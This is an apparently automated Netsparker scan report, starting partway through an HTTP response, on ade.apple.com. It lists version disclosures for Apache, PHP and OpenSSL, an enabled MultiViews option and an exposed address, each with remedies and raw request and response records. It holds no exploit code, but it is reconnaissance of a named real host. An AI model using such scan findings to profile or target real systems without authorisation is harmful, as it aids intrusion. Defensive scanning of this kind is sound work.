Set-Cookie: SEP_Forum_before_last_login_date=deleted; expires=Thu, 15-Jul-2010 18:15:15 GMT; path=/,SEP_Forum_last_login_date=deleted; expires=Thu, 15-Jul-2010 18:15:15 GMT; path=/
Cache-Control: no-cache
Expires: 0
Pragma: nocache
Location: home.php
MS-Author-Via: DAV
Content-Length: 0
Connection: close
Content-Type: text/html


Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

http://ade.apple.com/

Extracted Version

2.2.11 (Unix)

Request

GET / HTTP/1.1
Referer: http://ade.apple.com/ade/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ade.apple.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Fri, 15 Jul 2011 18:15:13 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
X-Powered-By: PHP/5.3.0
Location: /ade/
Cache-Control: max-age=60
Expires: Fri, 15 Jul 2011 18:16:13 GMT
MS-Author-Via: DAV
Content-Length: 0
Connection: close
Content-Type: text/html


PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /

/

http://ade.apple.com/

Extracted Version

PHP/5.3.0

Request

GET / HTTP/1.1
Referer: http://ade.apple.com/ade/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ade.apple.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Fri, 15 Jul 2011 18:15:13 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
X-Powered-By: PHP/5.3.0
Location: /ade/
Cache-Control: max-age=60
Expires: Fri, 15 Jul 2011 18:16:13 GMT
MS-Author-Via: DAV
Content-Length: 0
Connection: close
Content-Type: text/html


OpenSSL Version Disclosure

OpenSSL Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

http://ade.apple.com/

Extracted Version

OpenSSL/0.9.8k

Request

GET / HTTP/1.1
Referer: http://ade.apple.com/ade/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ade.apple.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Fri, 15 Jul 2011 18:15:13 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
X-Powered-By: PHP/5.3.0
Location: /ade/
Cache-Control: max-age=60
Expires: Fri, 15 Jul 2011 18:16:13 GMT
MS-Author-Via: DAV
Content-Length: 0
Connection: close
Content-Type: text/html


Apache Module Version Disclosure

Apache Module Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

http://ade.apple.com/

Extracted Version

mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0

Request

GET / HTTP/1.1
Referer: http://ade.apple.com/ade/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ade.apple.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Fri, 15 Jul 2011 18:15:13 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
X-Powered-By: PHP/5.3.0
Location: /ade/
Cache-Control: max-age=60
Expires: Fri, 15 Jul 2011 18:16:13 GMT
MS-Author-Via: DAV
Content-Length: 0
Connection: close
Content-Type: text/html


Apache MultiViews Enabled

Apache MultiViews Enabled

1 TOTAL
LOW
Netsparker identified that the Apache MultiViews option is enabled. This vulnerability can be used for locating and obtaining access to some hidden resources.

Impact

An attacker can use this functionality to aid in finding hidden file processes on the directory and potentially gather further sensitive information.

Remedy

Change your httpd.conf file. A recommended configuration for the requested directory should be in the following format:
<Directory /{YOUR DIRECTORY}>
	Options FollowSymLinks 
</Directory>
Remove the MultiViews option from configuration.
- /ade/login

/ade/login

http://ade.apple.com/ade/login

Request

HEAD /ade/login HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: netsparker/check
Cache-Control: no-cache
Host: ade.apple.com
Cookie: PHPSESSID=i51263lduvg7amrpn392snrned13rkvq
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 406 Not Acceptable
Date: Fri, 15 Jul 2011 18:15:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
Alternates: {"login.php" 1 {type application/x-httpd-php} {length 3838}}
Vary: negotiate
TCN: list
Connection: close
Content-Type: text/html; charset=iso-8859-1


Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /ade/images/

/ade/images/ CONFIRMED

http://ade.apple.com/ade/images/

Request

GET /ade/images/ HTTP/1.1
Referer: http://ade.apple.com/ade/images/ade_webclip_icon.png
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ade.apple.com
Cookie: PHPSESSID=745uereijepcsq4aq0t9fu3jb7f6rpd5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Fri, 15 Jul 2011 18:15:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
Vary: accept-language,accept-charset
Accept-Ranges: bytes
MS-Author-Via: DAV
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Content-Language: en


<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Access forbidden!</title><link rev="made" href="mailto:admin@example.com" /><style type="text/css"><!--/*--><![CDATA[/*><!--*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*]]>*/--></style></head><body><h1>Access forbidden!</h1><p> You don't have permission to access the requested directory. There is either no index document or the directory is read-protected. </p><p>If you think this is a server error, please contactthe <a href="mailto:admin@example.com">webmaster</a>.</p><h2>Error 403</h2><address> <a href="/">ade.apple.com</a><br /> <span>Fri Jul 15 11:15:14 2011<br /> Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0</span></address></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /ade/images/

/ade/images/

http://ade.apple.com/ade/images/

Found E-mails

admin@example.com

Request

GET /ade/images/ HTTP/1.1
Referer: http://ade.apple.com/ade/images/ade_webclip_icon.png
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ade.apple.com
Cookie: PHPSESSID=745uereijepcsq4aq0t9fu3jb7f6rpd5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Fri, 15 Jul 2011 18:15:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
Vary: accept-language,accept-charset
Accept-Ranges: bytes
MS-Author-Via: DAV
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Content-Language: en


<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Access forbidden!</title><link rev="made" href="mailto:admin@example.com" /><style type="text/css"><!--/*--><![CDATA[/*><!--*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*]]>*/--></style></head><body><h1>Access forbidden!</h1><p> You don't have permission to access the requested directory. There is either no index document or the directory is read-protected. </p><p>If you think this is a server error, please contactthe <a href="mailto:admin@example.com">webmaster</a>.</p><h2>Error 403</h2><address> <a href="/">ade.apple.com</a><br /> <span>Fri Jul 15 11:15:14 2011<br /> Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0</span></address></body></html>